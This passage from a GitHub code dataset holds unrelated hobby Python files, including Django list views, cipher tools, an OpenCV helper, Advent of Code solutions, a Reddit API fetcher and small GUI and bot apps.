input('Souhaitez-vous quitter la table de jeu? 
(O/N)')\n if quitter == 'O' or quitter == 'o':\n print('À bientot!')\n continuer = False\n break","repo_name":"i3652/Zcasino","sub_path":"ZCasinoo.py","file_name":"ZCasinoo.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11342598892","text":"import traceback\n\nfrom django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.db.models import Count\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\nfrom listArch.models import ListProduct, Product, ProductDesc, Customer, Company\nfrom listArch.models.List import List\nfrom listArch.services import general_methods\n\n\ndef addList(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('listArch:kullanici-giris-yap')\n\n try:\n\n if request.method == 'POST':\n list = List(list_name=request.POST['list_name'], user=request.user, type=request.POST['list_type'],\n description=request.POST['description'])\n list.save()\n\n reference_list = request.POST['reference_list']\n if reference_list != 'Yok' and reference_list != 'Bağlantılı Liste':\n list.reference_list = List.objects.get(list_name=reference_list)\n list.save()\n\n product_id = request.POST['product']\n product = Product.objects.get(pk=product_id)\n\n product_list = ListProduct(list=list, product=product)\n product_list.save()\n\n messages.success(request, \"Listenize ürün eklendi\")\n return redirect('listArch:kullanici-listeleri')\n\n\n except Exception as e:\n print(e)\n return redirect('listArch:404-sayfasi')\n return redirect('listArch:kullanici-listeleri')\n\n\ndef delete_list(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('listArch:kullanici-giris-yap')\n if request.POST:\n try:\n\n list_id = request.POST['list_id']\n list = List.objects.get(pk=list_id)\n list.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef list_detail(request, pk):\n try:\n user = request.user\n customer = Customer.objects.get(user=user)\n user_list = List.objects.filter(user=user)\n list = List.objects.get(pk=pk)\n list_product = ListProduct.objects.filter(list=list)\n return render(request, 'User/list-detail.html',\n {'list_product': list_product, 'list': list, 'customer': customer, 'user_list': user_list})\n except Exception as e:\n traceback.print_exc()\n\n return redirect('listArch:404-sayfasi')\n\n\ndef print_list_page(request, pk):\n user = request.user\n customer = Customer.objects.get(user=user)\n user_list = List.objects.filter(user=user)\n list = List.objects.get(pk=pk)\n list_product = ListProduct.objects.filter(list=list)\n company = Company.objects.filter(user=user)\n return render(request, 'User/list_print_page.html',\n {'list_product': list_product, 'list': list, 'customer': customer, 'user_list': user_list,\n 'company': company[0]})\n\n\ndef add_product_list(request, product_id, list_id):\n try:\n list = List.objects.filter(pk=list_id)\n list_product = ListProduct(list=list[0], product=Product.objects.filter(pk=product_id)[0])\n list_product.save()\n messages.success(request, \"Ürün Listenize Başarıyla Eklendi.\")\n return redirect('listArch:kullanici-listeleri')\n\n except Exception as e:\n\n print(e)\n return redirect('listArch:404-sayfasi')\n\n\ndef remove_product_list(request):\n if 
request.method == 'POST':\n try:\n list_id = request.POST['list_id']\n product_id = request.POST['product_id']\n list = List.objects.get(pk=list_id)\n list_product = ListProduct.objects.filter(list=list)\n\n for product in list_product:\n if product.product.pk == int(product_id):\n product.delete()\n messages.success(request, \"Ürün Listenizden Çıkarıldı.\")\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef list(request):\n try:\n\n user = request.user\n user_lists = List.objects.filter(user=user)\n list_product = ListProduct.objects.filter(list__user=user).values(\n 'list').annotate(\n count=Count('product'))\n\n array = []\n for list_product in list_product:\n list_dict = dict()\n list_products = ListProduct.objects.filter(list_id=list_product['list'])\n if list_products.count() > 0:\n list_dict['list'] = list_products[0].list\n list_dict['products'] = list_products\n\n array.append(list_dict)\n\n return render(request, 'User/list.html', {'list': array, 'user_lists': user_lists})\n\n except Exception as e:\n print(e)\n return redirect('listArch:404-sayfasi')\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Views/ListViews.py","file_name":"ListViews.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17213634124","text":"class Solution:\n def gridIllumination(self, N: int, lamps: List[List[int]], queries: List[List[int]]) -> List[int]:\n if len(lamps) == 0:\n return [0 for _ in queries]\n lamp_map = {}\n col = {}\n row = {}\n lD = {}\n rD = {}\n \n for lamp in lamps:\n lamp_map[(lamp[0], lamp[1])] = True\n if lamp[1] in col:\n col[lamp[1]] += 1\n else:\n col[lamp[1]] = 1\n if lamp[0] in row:\n row[lamp[0]] += 1\n else:\n row[lamp[0]] = 1\n a = lamp[0]+N-1-lamp[1]\n if a in lD:\n lD[a] += 1\n else:\n lD[a] = 1\n b = lamp[0]+lamp[1]\n if b in rD:\n rD[b] += 1\n else:\n rD[b] = 1\n \n ans = [0 for _ in queries]\n for i, query in enumerate(queries):\n a = query[0]+N-1-query[1]\n b = query[0]+query[1]\n if (query[1] in col and col[query[1]] > 0) or (query[0] in row and row[query[0]] > 0) or (a in lD and lD[a] > 0) or (b in rD and rD[b] > 0):\n ans[i] = 1\n else:\n ans[i] = 0\n \n poses = [(query[0], query[1]), (query[0], query[1]-1),(query[0], query[1]+1),(query[0]-1, query[1]),(query[0]+1, query[1]),(query[0]-1, query[1]-1),(query[0]+1, query[1]+1), (query[0]-1, query[1]+1), (query[0]+1, query[1]-1)]\n \n for pos in poses:\n if pos in lamp_map and lamp_map[pos] == True:\n lamp_map[pos] = False\n col[pos[1]] -= 1\n row[pos[0]] -= 1\n lD[pos[0]+N-1-pos[1]] -= 1\n rD[pos[0]+pos[1]] -= 1\n return ans\n \n \n \n ","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/1001_GridIllumination.py","file_name":"1001_GridIllumination.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41686753844","text":"import cv2\n\n\ndef adaptiveThresh(img):\n img = cv2.medianBlur(img, 5)\n ret, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\n th2 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, 11, 2)\n th3 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY, 11, 2)\n titles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']\n 
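# editor's note: in the adaptive calls above, blockSize=11 is the pixel\n    # neighbourhood used to compute each local threshold, and C=2 is a constant\n    # subtracted from the (mean or Gaussian-weighted) neighbourhood mean\n    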
images = [img, th1, th2, th3]\n return zip(images, titles)","repo_name":"marvinirwin/python-opencv-selenium-canvas","sub_path":"adaptive_thresh.py","file_name":"adaptive_thresh.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70095815528","text":"import argparse\nimport json\nimport sys\n \nfrom sources.hack import CaesarHacker\nfrom sources.train import Trainer\nfrom sources.encode import CaesarEncoderAndDecoder, VigenereEncoderAndDecoder, VernamEncoderAndDecoder\n \n\ndef code(args, decrypt):\n if args.cipher == 'caesar':\n encoder = CaesarEncoderAndDecoder(args.key)\n elif args.cipher == 'vigenere':\n encoder = VigenereEncoderAndDecoder(args.key)\n else:\n encoder = VernamEncoderAndDecoder(args.key)\n text = args.input_file.read()\n args.output_file.write(encoder.encode(text, decrypt))\n\n\ndef encode(args):\n code(args, False)\n \n \ndef decode(args):\n code(args, True)\n \n \ndef train(args):\n text = args.text_file.read()\n trainer = Trainer()\n trainer.feed(text)\n args.model_file.write(trainer.get_json_model())\n \n \ndef hack(args):\n try:\n model = json.load(args.model_file)\n except json.JSONDecodeError:\n raise SyntaxError('Model file is not correct')\n hacker = CaesarHacker(model)\n text = args.input_file.read()\n args.output_file.write(hacker.hack(text))\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n # parser to encode\n parser_encode = subparsers.add_parser('encode')\n parser_encode.add_argument('--cipher', choices=['caesar', 'vigenere', 'vernam'], required=True)\n parser_encode.add_argument('--key', required=True)\n parser_encode.add_argument('--input-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_encode.add_argument('--output-file', type=argparse.FileType('w'), default=sys.stdout)\n parser_encode.set_defaults(func=encode)\n\n # parser to decode\n parser_decode = subparsers.add_parser('decode')\n parser_decode.add_argument('--cipher', choices=['caesar', 'vigenere', 'vernam'], required=True)\n parser_decode.add_argument('--key', required=True)\n parser_decode.add_argument('--input-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_decode.add_argument('--output-file', type=argparse.FileType('w'), default=sys.stdout)\n parser_decode.set_defaults(func=decode)\n\n # parser to train\n parser_train = subparsers.add_parser('train')\n parser_train.add_argument('--text-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_train.add_argument('--model-file', type=argparse.FileType('w'), required=True)\n parser_train.set_defaults(func=train)\n\n # parser to hack\n parser_hack = subparsers.add_parser('hack')\n parser_hack.add_argument('--input-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_hack.add_argument('--output-file', type=argparse.FileType('w'), default=sys.stdout)\n parser_hack.add_argument('--model-file', type=argparse.FileType('r'), required=True)\n parser_hack.set_defaults(func=hack)\n\n args = parser.parse_args()\n args.func(args)\n\n","repo_name":"imarenf/Encryptor","sub_path":"encryptor.py","file_name":"encryptor.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16800264466","text":"# imports\nimport numpy as np\nimport pandas as pd\nfrom ast import literal_eval\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\nimport 
matplotlib\nimport matplotlib.pyplot as plt\n\n# load data\ndatafile_path = \"embeddings/SIGMOD/path_sum.csv\"\n\ndf = pd.read_csv(datafile_path)\ndf[\"embedding\"] = df.embedding.apply(literal_eval).apply(\n    np.array\n)  # convert string to numpy array\nmatrix = np.vstack(df.embedding.values)\nprint(matrix.shape)\n\nn_clusters = 5\n\nkmeans = KMeans(n_clusters=n_clusters, init=\"k-means++\", random_state=42)\nkmeans.fit(matrix)\nlabels = kmeans.labels_\ndf[\"Cluster\"] = labels\n\ndf.groupby(\"Cluster\")\n# df.groupby(\"Cluster\").Score.mean().sort_values()\n\ntsne = TSNE(\n    n_components=2, perplexity=15, random_state=42, init=\"random\", learning_rate=200\n)\nvis_dims2 = tsne.fit_transform(matrix)\n\nx = [x for x, y in vis_dims2]\ny = [y for x, y in vis_dims2]\n\n# one color per cluster (n_clusters = 5)\nfor category, color in enumerate([\"purple\", \"green\", \"red\", \"blue\", \"orange\"]):\n    xs = np.array(x)[df.Cluster == category]\n    ys = np.array(y)[df.Cluster == category]\n    plt.scatter(xs, ys, color=color, alpha=0.3)\n\n    avg_x = xs.mean()\n    avg_y = ys.mean()\n\n    plt.scatter(avg_x, avg_y, marker=\"x\", color=color, s=100)\nplt.title(\"Clusters identified, visualized in 2d using t-SNE\")\nplt.show()\n","repo_name":"hzwy3c/ConferenceQA","sub_path":"utils/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37404408242","text":"from tkinter import *\nimport datetime\nimport time\nfrom time import strftime\nfrom tkinter import messagebox\nfrom suivant import suivant\n\n# Main window:\n\n \nglobal fen\nfen = Tk()\n\nfen.title(\"GOPApp\")\nfen.geometry(\"720x500\")\nfen.maxsize(720, 500)\nfen.minsize(720, 500)\nfen.iconbitmap('icone.ico')\n#fen.config(background=\"#41B77F\")\n# Add image:\n\n# define image:\nbg = PhotoImage(file=\"images/image.png\")\nmy_label= Label(fen, image=bg)\nmy_label.place(x=0, y=0, relwidth=1, relheight=1)\n# Add quit button:\nquitter=Button(fen, text=\"Quitter\",font=(\"Courrier\",20),bg=\"red\", fg='black', command=fen.quit)\nquitter.place(x=200, y=400)\n# test function:\n \n# Add 'next' button:\nsuivant = Button(fen, text=\"Suivant\",font=(\"Courrier\",20),bg=\"blue\", fg='black', command=suivant)\nsuivant.place(x=400, y=400)\n\n# Add a frame: (box)\nf1 = Frame(fen, bd=1, relief=SUNKEN)\n# Add text:\nlabel_title=Label(f1, text=\"Bienvenue sur GOPApp\", font=(\"Courrier\",25))\nlabel_title.pack(expand=YES)\n# add more text:\nlabel_subtitle=Label(f1, text=\"Une application qui vous garantit une meilleur prédiction\", font=(\"Courrier\",20))\nlabel_subtitle.pack(expand=YES)\nf1.pack(expand=YES) \nfen.mainloop()\n","repo_name":"ChaikhiBelaid/GOPApp","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22566228362","text":"from rich import print\n\n\ndef get_input():\n    input = []\n    with open(\"input.txt\") as input_txt:\n        for line in input_txt:\n            input.append(line.strip())\n    return input\n\n\ndef part_1(input):\n    bit_count = [0] * len(input[0])\n    for binary_string in input:\n        for i, one_or_zero in enumerate(binary_string):\n            bit_count[i] += int(one_or_zero)\n\n    gamma_string = \"\"\n    epsilon_string = \"\"\n    for bit in bit_count:\n        if bit > (len(input) / 2):\n            gamma_string = gamma_string + \"1\"\n            epsilon_string = epsilon_string + \"0\"\n        else:\n            gamma_string = gamma_string + \"0\"\n            epsilon_string = 
epsilon_string + \"1\"\n\n gamma = int(gamma_string, base=2)\n epsilon = int(epsilon_string, base=2)\n\n return gamma * epsilon\n\n\ndef filtermagic(numbers, use_most_common, bit=0):\n assert len(numbers) != 0\n if len(numbers) == 1:\n return numbers[0]\n\n ones_count = 0\n for number in numbers:\n ones_count += int(number[bit])\n\n most_common = 1 if ones_count >= (len(numbers) / 2) else 0\n value = most_common if use_most_common else (most_common + 1) % 2\n value = str(value)\n\n filtered = [n for n in numbers if n[bit] == value]\n return filtermagic(filtered, use_most_common, bit=bit + 1)\n\n\ndef part_2(input):\n oxygen = int(filtermagic(input, True), base=2)\n co2 = int(filtermagic(input, False), base=2)\n return oxygen * co2\n\n\nif __name__ == \"__main__\":\n input = get_input()\n\n part_1 = part_1(input)\n print(f\"Puzzle Part 1: {part_1}\")\n\n part_2 = part_2(input)\n print(f\"Puzzle Part 2: {part_2}\")\n","repo_name":"promarcel/advent-of-code-2021","sub_path":"03/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38029478154","text":"from __future__ import print_function, division\nfrom builtins import range\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten, Dropout, BatchNormalization\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# helper\ndef y2indicator(Y):\n N = len(Y)\n K = len(set(Y))\n I = np.zeros((N, K))\n I[np.arange(N), Y] = 1\n return I\n\ndata = pd.read_csv('C:/Python/fashion_mnist/fashion-mnist_train.csv')\ndata = data.as_matrix()\nnp.random.shuffle(data)\n\nX = data[:, 1:].reshape(-1, 28, 28, 1) / 255.0\nY = data[:, 0].astype(np.int32)\n\n# get shapes\n# N = len(Y)\nK = len(set(Y))\n\nY = y2indicator(Y)\n\nmodel = Sequential()\n\nmodel.add(Conv2D(input_shape=(28, 28, 1), filters=32, kernel_size=(3, 3)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D())\n\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D())\n\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D())\n\nmodel.add(Flatten())\nmodel.add(Dense(units=300))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(units=K))\nmodel.add(Activation('softmax'))\n\nmodel.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n)\n\nmodel.summary()\n\nr = model.fit(X, Y, validation_split=0.33, epochs=15, batch_size=32)\nprint('Returned:', r)\nprint(r.history.keys())\n\nplt.plot(r.history['loss'], label='loss')\nplt.plot(r.history['val_loss'], label='val_loss')\nplt.legend()\nplt.show()\n\nplt.plot(r.history['accuracy'], label='acc')\nplt.plot(r.history['val_accuracy'], label='val_acc')\nplt.legend()\nplt.show()","repo_name":"philgineer/Deeplearning_projects","sub_path":"advanced_computer_vision/fashion_mnist_cnn.py","file_name":"fashion_mnist_cnn.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40803726372","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom syslogs.models import Log\n\n\ndef ops_list(request):\n return render(request, 
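# editor's note: this view only renders the template; the table rows are\n                  # fetched separately by get_ops_list below, which returns JSON\n                  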
'syslogs/ops_list.html')\n\n\ndef get_ops_list(request):\n if request.user.is_superuser:\n logs = Log.objects.all().order_by('-id')\n else:\n user = request.user.username\n logs = Log.objects.filter(user=user).order_by('-id')\n data = []\n if logs:\n data = [log.to_dict() for log in logs]\n return JsonResponse({'data': data})\n\n\ndef get_log_clear(request):\n if not request.user.is_superuser:\n JsonResponse({'result': False, 'message': 'Permission denied'})\n try:\n Log.objects.all().delete()\n return JsonResponse({'result': True})\n except:\n return JsonResponse({'result': False})","repo_name":"dtlisir/dwm","sub_path":"syslogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7053937209","text":"# Problem No.: 1541\n# Solver: Jinmin Goh\n# Date: 20200413\n# URL: https://www.acmicpc.net/problem/1541\n\nimport sys\n\ndef main():\n string = input()\n temp = \"\"\n nums = []\n ops = []\n for i in string:\n if i not in [\"+\", \"-\"]:\n temp += i\n else:\n nums.append(int(temp))\n ops.append(i)\n temp = \"\"\n nums.append(int(temp))\n #print(nums, ops)\n ans = nums.pop(0)\n while ops:\n if ops[0] == \"-\":\n break\n else:\n ans += nums.pop(0)\n ops.pop(0)\n temp = 0\n while ops:\n if ops[0] == \"-\":\n ops.pop(0)\n temp += nums.pop(0)\n while ops and ops[0] != \"-\":\n temp += nums.pop(0)\n ops.pop(0)\n ans -= temp\n temp = 0\n print(ans)\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/01541/01541.py","file_name":"01541.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32873162421","text":"class Solution(object):\n \"\"\"\n一只青蛙一次可以跳上1级台阶,也可以跳上2级台阶。求该青蛙跳上一个 n 级的台阶总共有多少种跳法。\n答案需要取模 1e9+7(1000000007),如计算初始结果为:1000000008,请返回 1。\n输入:n = 2 输出:2\n输入:n = 7 输出:21\n0 <= n <= 100\n链接:https://leetcode-cn.com/problems/qing-wa-tiao-tai-jie-wen-ti-lcof\n \"\"\"\n def numWays(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n # opt = [1] * (n + 1)\n # for i in range(2, n + 1):\n # opt[i] = opt[i - 1] + opt[i - 2]\n # return opt[n] % 1000000007\n pre, cur = 1, 1\n for i in range(2, n + 1):\n pre, cur = cur, (pre + cur) % 1000000007\n return cur\n\n\ndef main():\n n = 7\n test = Solution()\n ret = test.numWays(n)\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jackyzzk/Coding-Interviews-2","sub_path":"剑指offer-面试题10- II. 青蛙跳台阶问题.py","file_name":"剑指offer-面试题10- II. 青蛙跳台阶问题.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11018722897","text":"#Exercise 1. Enter your name and receive a salutation.\nnombre = input(\"What should I call you? \")\nprint(\"Hello \" + nombre + \".\")\n\n#Exercise 2. Energetic and informative salutation.\nnOMBRE = input(\"TELL ME YOUR NAME AGAIN! \")\nprint(\"HELLO {}! YOUR NAME HAS {} LETTER(S)!\".format(nOMBRE.upper(), len(nOMBRE)))\n\n#Exercise 3. 
Make a madlib that turns into a horrible limerick\nprint(\"Let's do a madlib!\")\ndestination = input(\"Give me a location: \")\nadjective = input(\"Give me an adjective: \")\nbodyPart = input(\"Give me a body part: \")\njob = input(\"Give me an occupation: \")\n\nprint(\"Okay here we go:\")\nprint(\"There once was a dude from {0},\\nWho always wore {1} clothing,\\nBut one day he fell,\\nAnd lost his {2},\\nNow he's a {3} for life!\\n\".format(destination, adjective, bodyPart, job))\n\nprint(\"...That was terrible.\")\n\n#Exercise 4. Input number to get corresponding day of the week.\nday = int(input('Day (0-6)? '))\ndaysOfWeek = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\nprint(\"That would be {}\".format(daysOfWeek[day]))\n\n#Exercise 5. Input number to determine if the corresponding day is for work or sleep.\nday = int(input('Day (0-6)? '))\ndaysOfWeek = [\"Sleep in.\", \"Go to work.\", \"Go to work.\", \"Go to work.\", \"Go to work.\", \"Go to work.\", \"Sleep in.\"]\nprint(daysOfWeek[day])\n\n#Exercise 6. Convert C to F degrees.\ntemp = round(int(input(\"Current temp in C? \")), 2)\nprint(\"That equals {} degrees F.\".format((temp * 1.8 + 32)))\n\n#Exercise 7. Calculate tip based on billing amount and service rating.\ntotalAmt = float(input(\"How much did you spend? \"))\nrating = input(\"Quality of service: Good, fair, or bad? \").lower()\nfeedback = False\nwhile (feedback == False):\n if rating == \"good\":\n print(\"Tip amount is ${0:.2f}.\".format(round(totalAmt * 0.20, 2)))\n feedback = True\n elif rating == \"fair\":\n print(\"Tip amount is ${0:.2f}.\".format(round(totalAmt * 0.15, 2)))\n feedback = True\n elif rating == \"bad\":\n print(\"Tip amount is ${0:.2f}.\".format(round(totalAmt * 0.10, 2)))\n feedback = True\n else:\n rating = input(\"Invalid rating. Please enter 'good,' 'fair,' or 'bad.' >> \").lower()\n \n#Exercise 8. Calculate the bill portion for multiple people.\ntotalAmt = float(input(\"How much did you spend? \"))\nrating = input(\"Quality of service: Good, fair, or bad? \").lower()\nsplitTip = int(input(\"Split how many ways? \"))\nfeedback = False\nwhile (feedback == False):\n if rating == \"good\":\n print(\"Tip amount is ${0:.2f}.\".format(round(((totalAmt * 0.20) / splitTip), 2)))\n feedback = True\n elif rating == \"fair\":\n print(\"Tip amount is ${0:.2f}.\".format(round(((totalAmt * 0.15) / splitTip), 2)))\n feedback = True\n elif rating == \"bad\":\n print(\"Tip amount is ${0:.2f}.\".format(round(((totalAmt * 0.10) / splitTip), 2)))\n feedback = True\n else:\n rating = input(\"Invalid rating. Please enter 'good,' 'fair,' or 'bad.' >> \").lower()\n \n#Exercise 9. Use a loop to print numbers 1 - 10.\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\n\n#Exercise 10. Give out 'coins' and keep a tally.\nprint(\"You have 0 coins. Would you like one?\")\ncoins = 0\ngreed = input(\"Y/N >> \").upper()\nwhile greed == \"Y\" or greed == \"YES\":\n coins += 1\n print(\"You now have {} coins. 
Would you like another?\".format(coins))\n greed = input(\"Y/N >> \").upper()\nprint(\"Okay, I guess {} coins is good enough.\".format(coins))\n ","repo_name":"jessicapolansky/Class-Python-exercise","sub_path":"Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32353691140","text":"from PyQt5 import uic, QtWidgets\r\nimport mysql.connector\r\n\r\n\r\nbanco = mysql.connector.connect(\r\n user='user',\r\n database='funcionario',\r\n passwd='password',\r\n port='3306'\r\n)\r\n\r\n\r\ndef cadastrarUsuario():\r\n cadastroUsuarioView.show()\r\n cadastroUsuarioView.pushButton.clicked.connect(salvarUsuario)\r\n cadastroUsuarioView.pushButton_2.clicked.connect(exibirUsuario)\r\n\r\n\r\ndef salvarUsuario():\r\n linhaUm = cadastroUsuarioView.lineEdit.text()\r\n linhaDois = cadastroUsuarioView.lineEdit_2.text()\r\n cursor = banco.cursor()\r\n comandoSql = f'insert into usuario (nome, senha) values(%s, %s)'\r\n dados = (str(linhaUm), str(linhaDois))\r\n cursor.execute(comandoSql, dados)\r\n banco.commit()\r\n\r\n\r\ndef exibirUsuario():\r\n exibirUsuarioView.show()\r\n cursor = banco.cursor()\r\n comandoSql = f'select * from usuario'\r\n cursor.execute(comandoSql)\r\n dados_lidos = cursor.fetchall()\r\n\r\n exibirUsuarioView.tableWidget.setRowCount(len(dados_lidos))\r\n exibirUsuarioView.tableWidget.setColumnCount(3)\r\n\r\n for i in range(0, len(dados_lidos)):\r\n for j in range(0,3):\r\n exibirUsuarioView.tableWidget.setItem(i,j, QtWidgets.QTableWidgetItem(str(dados_lidos[i][j])))\r\n\r\n\r\ndef cadastrarProduto():\r\n cadastroProdutoView.show()\r\n cadastroProdutoView.pushButton.clicked.connect(salvarProduto)\r\n\r\n\r\ndef salvarProduto():\r\n produto = cadastroProdutoView.lineEdit.text()\r\n qtd = cadastroProdutoView.lineEdit_2.text()\r\n descricao = cadastroProdutoView.lineEdit_3.text()\r\n preco = cadastroProdutoView.lineEdit_4.text()\r\n\r\n\r\n cursor = banco.cursor()\r\n comandoSql = f'insert into produto (chave, descricao, qtd, preco) values(%s, %s, %s, %s)'\r\n dados = (str(produto), str(descricao), int(qtd), float(preco))\r\n cursor.execute(comandoSql, dados)\r\n banco.commit()\r\n\r\n cadastroProdutoView.show()\r\n\r\n\r\n#Inicio\r\n#Gerando a aplicacao\r\napp = QtWidgets.QApplication([])\r\n\r\n#Carregar o Arquivo .ui\r\ntelaInicial = uic.loadUi('View/TelaInicial.ui')\r\ncadastroUsuarioView = uic.loadUi('View/CadastroUsuario.ui')\r\ncadastroProdutoView = uic.loadUi('View/CadastroProduto.ui')\r\nexibirUsuarioView = uic.loadUi('View/ExibirUsuario.ui')\r\ntelaInicial.pushButton.clicked.connect(cadastrarUsuario)\r\ntelaInicial.pushButton_2.clicked.connect(cadastrarProduto)\r\n\r\n#Exibir Minha Tela\r\ntelaInicial.show()\r\napp.exec()\r\n","repo_name":"antenoradjafre/InfinitySchool","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74315976487","text":"import discord\nfrom discord.ext import commands\nfrom discord import app_commands\n\n\nclass Bot(commands.Cog):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n await self.bot.change_presence(\n status=discord.Status.online,\n activity=discord.Game(f\"Extending your links!\"))\n print('This bot is online!')\n\n\nasync def setup(bot: commands.Bot):\n await 
bot.add_cog(Bot(bot))","repo_name":"CygnusX-26/Link-Extender","sub_path":"bot/cogs/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73440924009","text":"#!/usr/bin/python3\n\"\"\"\nqueries the Reddit API and prints the titles\nof the first 10 hot posts listed for a given subreddit\n\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"\n print the titles of the 10 hot posts\n \"\"\"\n\n url = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)\n headers = {\n 'user-agent': 'my user agent 1.0',\n 'content-type': 'application/json'\n }\n r = requests.get(url, allow_redirects=False, headers=headers)\n if r.status_code != requests.codes.ok:\n print('None')\n else:\n listing = r.json().get('data').get('children')\n return ([print(\n post.get('data').get('title')) for post in listing[:10]])\n","repo_name":"leobyeon/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40727674698","text":"import sys\n\ndef draw_filesystem(d, indent=0):\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\tprint(' ' * indent + str(key))\n\t\t\tdraw_filesystem(value, indent + 1)\n\t\telse:\n\t\t\tprint(' ' * (indent + 0) + str(key) + \" : \" + str(value))\n\ndef count_sizes(d, indent=0):\n\ttmp = 0\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\ttmp += count_sizes(value, indent+1)\n\t\telse:\n\t\t\ttmp += int(value)\n\td[\"directory_size\"] = tmp\n\treturn tmp\n\ndef build_filesystem(file):\n\tfs = {}#filesystem\n\twd = fs#working directory\n\tpath = []#path of working directory\n\ti = 1\n\tisls = False\n\n\twhile i < len(file):\n\t\tw = file[i].split(' ')\n\t\tif w[0] == '$':\n\t\t\tisls = False\n\t\tif isls:\n\t\t\tif w[0] == \"dir\":\n\t\t\t\twd[w[1]] = {}\n\t\t\telse:\n\t\t\t\twd[w[1]] = w[0]\n\t\tif 